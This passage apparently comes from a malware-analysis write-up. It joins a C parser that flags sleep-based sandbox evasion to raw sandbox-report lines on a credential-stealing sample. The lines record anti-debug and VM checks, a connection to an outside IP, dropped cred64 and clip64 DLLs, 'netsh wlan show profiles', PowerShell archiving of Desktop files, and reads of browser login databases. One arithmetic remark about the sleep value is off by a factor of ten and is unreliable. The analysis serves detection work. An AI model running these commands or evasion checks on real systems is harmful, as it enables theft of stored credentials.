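    "Source: C:\\Users\\user\\AppData\\Local\\Temp\\00c07260dc\\explorgu.exe TID: 7928 Thread sleep time: -2247123s >= -30000s",
    "Source: C:\\Users\\user\\AppData\\Local\\Temp\\00c07260dc\\explorgu.exe TID: 8008 Thread sleep time: -180000s >= -30000s",
    "Source: C:\\Windows\\SysWOW64\\rundll32.exe TID: 2008 Thread sleep count: 9994 > 30",
    "Source: C:\\Windows\\SysWOW64\\rundll32.exe TID: 2008 Thread sleep time: -9994000s >= -30000s",
    "Source: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe TID: 7316 Thread sleep time: -7378697629483816s >= -30000s",
};
#define SAMPLE_N (sizeof SAMPLE_LINES / sizeof *SAMPLE_LINES)

/* Parses one report line into its parts; returns 0 for any other line. */
int parse_sleep_line(const char *line, char *proc, size_t proc_sz, int *tid,
                     long long *count, long long *total_ms) {
    const char *src = strstr(line, "Source: "), *tidp = strstr(line, " TID: ");
    if (!src || !tidp || tidp < src) return 0;
    src += strlen("Source: ");
    size_t len = (size_t)(tidp - src);
    if (len >= proc_sz) len = proc_sz - 1;
    memcpy(proc, src, len);
    proc[len] = '\0';
    if (sscanf(tidp, " TID: %d", tid) != 1) return 0;
    *count = *total_ms = 0;
    const char *c = strstr(tidp, "Thread sleep count: ");
    const char *t = strstr(tidp, "Thread sleep time: -");
    if (c && sscanf(c, "Thread sleep count: %lld", count) == 1) return 1;
    if (t && sscanf(t, "Thread sleep time: -%lld", total_ms) == 1) return 1;
    return 0;
}

static struct sleep_rec *find_or_add(struct sleep_rec *recs, int *n, int max, const char *proc, int tid) {
    for (int i = 0; i < *n; i++)
        if (recs[i].tid == tid && strcmp(recs[i].proc, proc) == 0) return &recs[i];
    if (*n >= max) return NULL;
    struct sleep_rec *r = &recs[(*n)++];
    memset(r, 0, sizeof *r);
    snprintf(r->proc, sizeof r->proc, "%s", proc);
    r->tid = tid;
    return r;
}

/* Aggregates every sleep line per (process, TID); returns the record count. */
int analyze_sleep_lines(const char *const *lines, size_t n_lines, struct sleep_rec *recs, int max) {
    int n = 0;
    for (size_t i = 0; i < n_lines; i++) {
        char proc[160]; int tid; long long count, total;
        if (!parse_sleep_line(lines[i], proc, sizeof proc, &tid, &count, &total)) continue;
        struct sleep_rec *r = find_or_add(recs, &n, max, proc, tid);
        if (!r) break;
        r->count += count;
        r->total_ms += total;
    }
    return n;
}

/* Per-call interval in ms (0 when the report gave no count for the thread). */
long long interval_ms(const struct sleep_rec *r) { return r->count ? r->total_ms / r->count : 0; }

/* The two thresholds the report prints next to each line. */
int flags_sleep_evasion(const struct sleep_rec *r) { return r->count > 30 || r->total_ms >= 30000; }

/* One statistic for a TID from the sample lines: 0 count, 1 total ms,
 * 2 interval ms, 3 evasion flag; -1 if the TID is absent. */
long long sample_stat(int tid, int which) {
    struct sleep_rec recs[16];
    int n = analyze_sleep_lines(SAMPLE_LINES, SAMPLE_N, recs, 16);
    for (int i = 0; i < n; i++) {
        if (recs[i].tid != tid) continue;
        if (which == 0) return recs[i].count;
        if (which == 1) return recs[i].total_ms;
        if (which == 2) return interval_ms(&recs[i]);
        return flags_sleep_evasion(&recs[i]);
    }
    return -1;
}

int main(void) {
    struct sleep_rec recs[16];
    int n = analyze_sleep_lines(SAMPLE_LINES, SAMPLE_N, recs, 16);
    for (int i = 0; i < n; i++)
        printf("TID %-5d %5lld calls %17lld ms (%lld ms each) %s %s\n", recs[i].tid, recs[i].count,
               recs[i].total_ms, interval_ms(&recs[i]), flags_sleep_evasion(&recs[i]) ? "FLAG" : "ok", recs[i].proc);
    return 0;
}
```

The powershell.exe entry (7378697629483816 ms, roughly 0.8 times the largest signed 64-bit value divided by 10000) is the shape of an effectively infinite wait rather than a timed sleep, which is why the report flags it on the time threshold alone; the parser keeps it as a plain total so the caller can treat such magnitudes specially.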
Source: C:\Users\user\Desktop\wIaKimJFke.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\rundll32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_6E22BA2F FindFirstFileExW,_free,FindNextFileW,_free,FindClose,_free, 10_2_6E22BA2F
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Thread delayed: delay time: 180000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\OneDrive\desktop.ini
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\Videos\desktop.ini
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\Music\desktop.ini
Source: explorgu.exe, explorgu.exe, 00000005.00000002.2869479107.000000000048F000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: rundll32.exe, 00000007.00000002.2064247735.0000029F08E60000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorgu.exe, 00000005.00000002.2870677611.00000000010F5000.00000004.00000020.00020000.00000000.sdmp, explorgu.exe, 00000005.00000002.2870677611.00000000010A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2064247735.0000029F08E72000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.2869541490.000000000332A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.2869541490.0000000003389000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: wIaKimJFke.exe, 00000000.00000002.1667967126.00000000006CF000.00000040.00000001.01000000.00000003.sdmp, explorgu.exe, 00000001.00000002.1694186183.000000000048F000.00000040.00000001.01000000.00000007.sdmp, explorgu.exe, 00000005.00000002.2869479107.000000000048F000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: rundll32.exe, 00000007.00000002.2064247735.0000029F08DB8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`
Source: explorgu.exe, 00000005.00000002.2870677611.00000000010F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW#
Source: netsh.exe, 00000008.00000003.1991253555.0000028334A06000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\wIaKimJFke.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\wIaKimJFke.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\wIaKimJFke.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\wIaKimJFke.exe Code function: 0_2_04ED0CC7 Start: 04ED0CDA End: 04ED0CDE 0_2_04ED0CC7
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe File opened: SIWVID
Source: C:\Users\user\Desktop\wIaKimJFke.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\wIaKimJFke.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\wIaKimJFke.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\wIaKimJFke.exe Code function: 0_2_04ED0C6D rdtsc 0_2_04ED0C6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_6E226871 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 10_2_6E226871
Source: C:\Users\user\Desktop\wIaKimJFke.exe Code function: 0_2_00515E8B mov eax, dword ptr fs:[00000030h] 0_2_00515E8B
Source: C:\Users\user\Desktop\wIaKimJFke.exe Code function: 0_2_00519B02 mov eax, dword ptr fs:[00000030h] 0_2_00519B02
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Code function: 5_2_002D5E8B mov eax, dword ptr fs:[00000030h] 5_2_002D5E8B
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Code function: 5_2_002D9B02 mov eax, dword ptr fs:[00000030h] 5_2_002D9B02
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_6E229EDF mov eax, dword ptr fs:[00000030h] 10_2_6E229EDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_6E22B511 mov eax, dword ptr fs:[00000030h] 10_2_6E22B511
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_6E22CEA4 GetProcessHeap, 10_2_6E22CEA4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_6E226871 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 10_2_6E226871
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_6E2294D4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 10_2_6E2294D4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_6E22610D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 10_2_6E22610D

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 185.215.113.32 80
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
Source: explorgu.exe, explorgu.exe, 00000005.00000002.2869479107.000000000048F000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Program Manager
Source: C:\Users\user\Desktop\wIaKimJFke.exe Code function: 0_2_004FCD47 cpuid 0_2_004FCD47
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Queries volume information: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Queries volume information: C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Queries volume information: C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Queries volume information: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Queries volume information: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\AIXACVYBSB.docx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\AIXACVYBSB.xlsx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\DTBZGIOOSO.docx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\KATAXZVCPS.xlsx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\NHPKIZUUSG.docx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\VLZDGUKUTZ.xlsx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\XZXHAVGRAG.xlsx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\Desktop\wIaKimJFke.exe Code function: 0_2_004FC54A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 0_2_004FC54A
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Code function: 5_2_002A55B0 LookupAccountNameA, 5_2_002A55B0

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles

Stealing of Sensitive Information

Source: Yara match File source: 10.2.rundll32.exe.6e220000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll, type: DROPPED
Source: Yara match File source: 10.2.rundll32.exe.6e220000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.wIaKimJFke.exe.4e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.explorgu.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.explorgu.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.1627718624.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2870573139.000000006E221000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2869343241.00000000002A1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1694112022.00000000002A1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1653832811.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1667895886.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.1944154808.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll, type: DROPPED
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\logins.json
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
